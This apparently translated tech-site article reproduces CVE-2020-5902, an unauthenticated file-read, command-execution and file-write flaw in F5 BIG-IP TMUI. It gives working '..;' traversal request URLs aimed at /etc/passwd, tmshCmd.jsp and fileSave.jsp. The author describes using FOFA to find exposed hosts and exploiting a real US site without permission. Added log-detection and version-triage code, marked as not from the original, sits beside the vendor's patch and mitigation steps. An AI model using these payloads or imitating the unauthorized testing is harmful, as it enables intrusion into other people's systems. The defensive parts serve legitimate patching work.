2025-04-06 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)05/31 Report--
Many people new to the topic are unsure how to make a simple reproduction of CVE-2020-5902. This article summarizes the cause of the problem and how to address it.
Simple reproduction of CVE-2020-5902
A vulnerability in F5 was reported in 2020; I decided to save the environment first, since it might be useful later.
1. Vulnerability description
Recently, F5 issued an official announcement fixing a remote code execution vulnerability (CVE-2020-5902) in the Traffic Management User Interface (TMUI). The vulnerability allows unauthenticated attackers, or authenticated users, with network access to the TMUI through the BIG-IP management port and/or self IPs to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. The vulnerability may compromise the entire system. PoC code has already been observed on the Internet, and attacks exploiting the vulnerability have occurred. Users are advised to upgrade and apply protections as soon as possible.
F5 BIG-IP is an application delivery platform from the US company F5 that integrates network traffic management, application security management, load balancing and other functions.
Reference link: https://support.f5.com/csp/article/K52145254
2. Affected version
F5 BIG-IP 15.x known vulnerable versions 15.1.0, 15.0.0
F5 BIG-IP 14.x known vulnerable versions 14.1.0-14.1.2
F5 BIG-IP 13.x known vulnerable versions 13.1.0-13.1.3
F5 BIG-IP 12.x known vulnerable versions 12.1.0-12.1.5
F5 BIG-IP 11.x known vulnerable versions 11.6.1-11.6.5
3. Vulnerability POC
File read:
https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
RCE:
https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
Write file:
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=123456
4. Reproduce
Because the vulnerability has only been public for a few days, many sites running vulnerable versions can still be found on the Internet (in fact, it feels as though most sites will not be fixed later). I tried a search and found that there are still many, so I tried directly against foreign sites (after all, setting up my own environment is quite troublesome, though I do not know whether the vulnerable sites I found are honeypots).
Use FOFA to search for the vulnerable version:
I found a US site that could be accessed normally. After a little testing, it was found to succeed.
Write to a file:
I tried the RCE to list users here; there was no output.
There is also a write-up online on getting a shell; because this is a real site, I did not continue. https://github.com/jas502n/CVE-2020-5902
I tried setting up my own environment, version 14.1.2. Because the official website no longer seems to offer a vulnerable version, I downloaded a copy that someone had shared on the Internet, but found that the web UI account password seems to have been changed by that person (the default is admin/admin). This does not matter, though; the vulnerability can still be used directly:
I tried msf. At first I downloaded the module offline and manually added it to msf, but the module could never be loaded, and in the end I did not solve it (my version of msf is probably too old to recognize the new module). In fact, the exp is already included in the new version of msf, so there is no need to add it manually; just update msf. (Here I ran into a problem where msf could not start after the update, which was solved later. I will summarize it later.)
There was no success here; I will try again later (the articles on the Internet are all the same: they only say that this module exists, and no one says that they successfully used the exp to get a shell).
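Every request in section 3 goes through a "..;" path segment after /tmui/login.jsp, which gives defenders a stable signature to hunt for in httpd access logs. The following is an added example, not code from the original article or from F5; it assumes Apache common/combined log format, and the log lines and IP addresses are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# JSP endpoints named in the PoC list in section 3 of this page.
SENSITIVE = ("fileRead.jsp", "tmshCmd.jsp", "fileSave.jsp")

# Assumed log format: Apache common/combined (src ... "METHOD target PROTO" status).
LINE_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP ranges), not taken from a real device.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120
198.51.100.7 - - [06/Jul/2020:10:01:09 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1843
198.51.100.7 - - [06/Jul/2020:10:01:15 +0000] "POST /tmui/login.jsp/%2e%2e%3b/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 196
203.0.113.5 - - [06/Jul/2020:10:02:00 +0000] "GET /tmui/login.jsp;jsessionid=ABC123 HTTP/1.1" 200 5120
"""

def decode_path(path, rounds=3):
    """Percent-decode repeatedly so %2e%2e%3b and double-encoded forms become '..;'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(line):
    """Return a finding dict for a '..;' hop under /tmui/, or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = decode_path(urlsplit(m["target"]).path)
    if not path.lower().startswith("/tmui/") or "/..;" not in path:
        return None
    endpoint = path.rsplit("/", 1)[-1]
    return {
        "src": m["src"],
        "endpoint": endpoint,
        "sensitive": endpoint in SENSITIVE,   # one of the PoC endpoints was reached
        "served": m["status"] == "200",       # 404 is what the httpd mitigation returns
    }

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with "served" set to True on a sensitive endpoint means the device answered the request and should be treated as potentially compromised, not merely probed.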
5. General patch recommendation: upgrade to the following versions
BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
Temporary patch recommendation: the vendor advises that the impact can be temporarily mitigated through the following steps:
1) Log in to the corresponding system with the following command:
tmsh
2) Edit the configuration of the httpd component:
edit /sys httpd all-properties
3) Set the include section as follows:
include 'Redirect 404 /'
4) Save the file: press ESC and enter
:wq
5) Execute the command to save the configuration:
save /sys config
6) Restart the httpd service:
restart sys service httpd
Also disable external IP access to the TMUI page.
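The vulnerable ranges in section 2 and the fixed builds in section 5 can be combined into a triage check for a device inventory. This is an added example, not part of the original article. It assumes that any build from the lowest listed vulnerable version up to (but not including) the fixed build of the same branch is vulnerable, and the hostnames are constructed placeholders.

```python
# Transcribed from sections 2 and 5 of this page:
# major branch -> (lowest known vulnerable version, first fixed version)
BRANCHES = {
    15: ("15.0.0", "15.1.0.4"),
    14: ("14.1.0", "14.1.2.6"),
    13: ("13.1.0", "13.1.3.4"),
    12: ("12.1.0", "12.1.5.2"),
    11: ("11.6.1", "11.6.5.2"),
}

def parse(version):
    """'14.1.2' -> (14, 1, 2, 0). Numeric tuples avoid the string trap '10' < '6'."""
    parts = [int(p) for p in version.strip().split(".")]
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"unexpected version format: {version!r}")
    return tuple(parts + [0] * (4 - len(parts)))

def triage(version):
    """Return (state, upgrade_target); state is vulnerable, fixed or not-listed."""
    v = parse(version)
    if v[0] not in BRANCHES:
        return ("not-listed", None)      # branch not covered by this page
    lowest, fixed = BRANCHES[v[0]]
    if v >= parse(fixed):
        return ("fixed", None)
    if v >= parse(lowest):               # assumption: whole gap below the fix is vulnerable
        return ("vulnerable", fixed)
    return ("not-listed", None)          # older than anything the page lists

def worklist(inventory):
    """inventory: {hostname: version}. Return sorted (host, version, target) to upgrade."""
    todo = []
    for host, version in inventory.items():
        state, target = triage(version)
        if state == "vulnerable":
            todo.append((host, version, target))
    return sorted(todo)

# Constructed inventory; hostnames are placeholders.
SAMPLE_INVENTORY = {
    "lb-a.example.net": "14.1.2",
    "lb-b.example.net": "14.1.2.10",
    "lb-c.example.net": "15.1.0.3",
    "lb-d.example.net": "16.0.0",
    "lb-e.example.net": "11.5.4",
}

if __name__ == "__main__":
    for row in worklist(SAMPLE_INVENTORY):
        print(*row)
```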